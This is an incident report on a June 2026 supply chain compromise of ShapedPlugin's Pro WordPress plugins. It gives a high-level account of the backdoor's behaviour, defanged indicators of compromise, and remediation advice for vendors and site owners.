Full Report
Multiple WordPress plugins from ShapedPlugin were compromised in a supply chain attack after unknown threat actors managed to tamper with the official release channels and push backdoor code. "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro plugin releases distributed through official licensed update channels," Wordfence said in an analysis
Analysis Summary
# Incident Report: ShapedPlugin Software Supply Chain Compromise
## Executive Summary
Multiple premium (Pro) WordPress plugins from vendor ShapedPlugin were compromised via a supply chain attack targeting the vendor’s build and distribution pipeline. Attackers injected backdoor code into official releases, allowing for credential theft, 2FA bypass, and full server takeover. The incident highlighted the high risk of trusted update channels being repurposed for malware distribution.
## Incident Details
- **Discovery Date:** June 2026 (Reported June 22, 2026)
- **Incident Date:** June 2026
- **Affected Organization:** ShapedPlugin
- **Sector:** Software Development / WordPress Ecosystem
- **Geography:** Global (Affected any licensed user of the Pro plugins)
## Timeline of Events
### Initial Access
- **Date/Time:** Preceding June 22, 2026
- **Vector:** Build and Distribution Pipeline Compromise
- **Details:** Unknown threat actors gained access to the vendor’s Easy Digital Downloads (EDD) infrastructure (account.shapedplugin[.]com) to tamper with Pro plugin builds.
### Lateral Movement
- **Details:** Once the backdoored plugin was installed on a victim site, the malware established a custom REST endpoint and dropped a web shell, allowing attackers to move from the WordPress application to the underlying server environment.
### Data Exfiltration/Impact
- **Details:** The malware extracted `wp-config.php` (database credentials), administrator account lists, SMTP mail credentials (via popular plugins), and the last 3 months of WooCommerce order data including payment methods.
### Detection & Response
- **Detection:** Discovered by security researchers at Wordfence.
- **Response:** ShapedPlugin confirmed the incident, began a review of distribution processes, and prepared updated, clean versions of the software.
## Attack Methodology
- **Initial Access:** Supply Chain Attack (Build pipeline poisoning).
- **Persistence:** Implementation of a "fake plugin" that registers a custom REST endpoint and drops a command-execution web shell.
- **Privilege Escalation:** Not explicitly required as the loader triggers on admin pages, executing with administrative context.
- **Defense Evasion:** Malware hides itself from the WordPress admin plugin list, uses a remote loader to fetch payloads, and deletes the extraction script (`install-persistent.php`) after execution to remove traces.
- **Credential Access:** Captures plaintext credentials and 2FA codes during user login. Steals SMTP and database credentials from configuration files.
- **Discovery:** Scans for installed mail plugins and WooCommerce data.
- **Lateral Movement:** Web shell provides command execution for potential server-wide movement.
- **Exfiltration:** Reports victim domains and stolen sensitive configuration data back to the C2 server.
- **Impact:** Full site compromise and data theft (PII and financial metadata).
## Impact Assessment
- **Financial:** High potential loss due to the theft of WooCommerce order data and payment method details.
- **Data Breach:** Exposure of database credentials, SMTP credentials, and customer order history.
- **Operational:** Massive disruption for site owners who must perform manual remediation and password resets.
- **Reputational:** Significant damage to ShapedPlugin's brand trust as a "Pro" software provider.
## Indicators of Compromise
- **Network Indicators:**
- `194.76.217[.]28:2871` (C2 / Payload delivery)
- `account.shapedplugin[.]com` (Source of compromised builds)
- **File Indicators:**
- `install-persistent.php` (Temporary extraction script)
- Unexplained "fake" plugins not visible in the standard admin UI.
- **Behavioral Indicators:** Outbound connections from WordPress servers to unrecognized IP addresses; unauthorized REST API calls.
## Response Actions
- **Containment:** ShapedPlugin began reviewing and securing the distribution pipeline.
- **Eradication:** Affected users are required to update to clean versions (e.g., Product Slider Pro > 3.5.4).
- **Recovery:** Site owners must reset all database and user passwords, and regenerate 2FA secrets.
## Lessons Learned
- **Supply Chain Vulnerability:** Vendors must implement integrity checks (e.g., code signing) and multi-factor authentication for their build and distribution environments.
- **Update Trust:** Even official licensed update channels can be a source of malware; organizations should monitor for unexpected behavior following updates.
## Recommendations
- **For Vendors:** Implement CI/CD pipeline auditing and sign all distribution packages to ensure they haven't been tampered with post-build.
- **For Site Owners:** Monitor `wp-config.php` for changes, use File Integrity Monitoring (FIM), and restrict outgoing network connections from web servers to known essential services only.